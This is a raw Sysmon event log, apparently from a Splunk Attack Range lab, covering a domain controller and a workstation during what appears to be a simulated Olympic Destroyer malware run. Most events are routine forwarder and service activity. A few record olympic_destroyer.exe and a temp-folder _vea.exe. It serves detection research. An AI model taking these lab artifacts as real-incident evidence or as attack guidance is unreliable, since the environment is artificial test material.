11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x008fcc31) 13241300x8000000000000000296029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289d-0x702281d9) 13241300x8000000000000000296028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a5-0xd1e6e9d9) 13241300x8000000000000000296027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:09:26.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ae-0x33ab51d9) 354300x8000000000000000296026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:24.694{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:27.871{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=913E7C6CE7CA722BB3409147C0DD2529,SHA256=CDF508F19EB15B8FBE226A7418AC822B5994C1BBEF4AFBE4EC493EB7A711DDE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:27.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C82784E78C1793DFC8A45845BBC7C4C5,SHA256=4E8738C9B442C38CB85222CB478E180BD1FFAAC9163EDD26B3121D81B5B549EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:24.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51560-false10.0.1.12-8000- 23542300x8000000000000000296041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:28.886{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E2CF949D628396A2F40517FFB4BCB5,SHA256=FEF5EC4AF38EDB0F913E6B004F298FA53AE9C0163655933FDD0420D7362A2EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:28.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42C5DA5E72DECD0D3F9F9F0EDD358C03,SHA256=75EEDF511EE352C4A2C7BBF607B4A9E688BEB8E91E5E6AA5F4DA02ACFE892BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:29.901{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=526E7562B2558DE8777293F287E05D7D,SHA256=4C25208672229516D1591E0DD0E2D2BED8DDF26ED0CC529ADB9321C0F539AFA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:29.445{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C002A05F74DD9ACDCB230A60EF1E5FE,SHA256=5450943DF679B8612F567ED961FD894A31B0F2FBCEC71E6F5E6BCC6BE6BDBB32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:30.934{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A7B5EE3C4D6E79C8F5E7AB4578C84A,SHA256=4F6FD1973C8A639F5DEBC516B32542333C8A0320F23ABA7B3ED9F1F3F506B3E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:30.460{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB973EBEE033E038A641756551C9ED4B,SHA256=90A99CE379FF090165C4005345CAAAB7173DAF8E34DDDC9B78E8DE865E3C0465,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:30.414{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C4BB9CD6DDD35A3B78E8A6F20D88B652,SHA256=DC92A3469A04256FC593542C16C5C050DFF46F3F8F529DE87ABE50C6789CA728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:31.952{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9745E055205389D1E9427F20D89C2487,SHA256=12CD7EAF1ACF2D03A04FD710F3CD56232876F8F77AB7448682F236E921918701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:31.476{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8D28D80D5412197CDD82A3C29004E75,SHA256=98E4C0CD25B0F83F8DFC0087259A5E3CC4DE98A359E0FFBA613862038C4890F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:29.722{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49303-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:32.967{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=969A4597598B231C345785F804EDC5B8,SHA256=29ECAC75529560960E250F6CE6326B8836EB8E01DC97022C4B3BE139686F94A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:32.726{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:32.726{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:32.726{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:32.476{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B83A9E1A0BDEBCDFD3FB61A80A735079,SHA256=6EE2E0AD4106766C7DF647B453FC92760AA8484B988028AAD4F9D3C0E81BD5F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:29.598{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51561-false10.0.1.12-8000- 23542300x8000000000000000296048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:33.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C8E32601A38FEA5F8D68E42B9A5FE6,SHA256=473CB909A93655FB446BFC000B9760F1B73CC746BA3EC367B84E0A54E7FE71FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:33.492{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DFF68FC4C188437A82E65DF6EB25B6A,SHA256=275EF28D94DD7CA858F28885EE6090C5769528D27BAF6195039CD77AA22F6277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:33.499{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0E358335E3DD85ADD4C4C770EE748F02,SHA256=140FEAEE6EB188B6EB078F36D978E063CFB396613CF61F4AEFCD42504C125B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:34.507{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC2FBA86894B04F7CFD13B5F7E9609BB,SHA256=97F83DF4E2282A0F84555DCF78681A9A32664E3433ED8BB85487590ADB44F7F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:34.583{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:35.507{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC186FCFF228E3C859A89550071117CA,SHA256=2099E56C7C0BFDAF32161B0BB2C49392339A16EB9B3D2FFD030C1E73E6158BAE,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000296053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:35.883{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000296052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:35.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7CC12B0F652E49E83442521BEB17D1A0,SHA256=507AF27C75C306800AE47ADB4CC3177A1760358B994EFD7723C429DA2427541F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:35.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=10F4C7C58BFB0FFD2FB8972D5569C8A0,SHA256=D42B7EBC690B5315DC51EECD1A388E92F4306697F105F01671A591976B191FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:35.015{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68A08AFDE5A8BC1504A42CF540D03B1D,SHA256=F24EA6260132CC7829E1CF7046D586EE6328CBC492D18112A9333E107128877D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:36.523{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA780D637BA720B00FB143038FE58F04,SHA256=0BB2567034AD3C3A2952A6FAF16F93D6C15B07CDFE3133B830C3889A4DAA0354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:36.051{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEEF1C054A7D897DC2656FE7B0928EC8,SHA256=54641305C1685EFC643959A58A4DAA6EF944BFF68DD7399428B6CA779F7C4E6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:34.644{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51562-false10.0.1.12-8000- 23542300x8000000000000000220114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:37.538{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E24334FEF1825EA7B7A199DB51492C,SHA256=2C9005C64BBDA66C9D3C47DC1AC363E296A1053839C4983DC5E3D8ADCD70EE76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 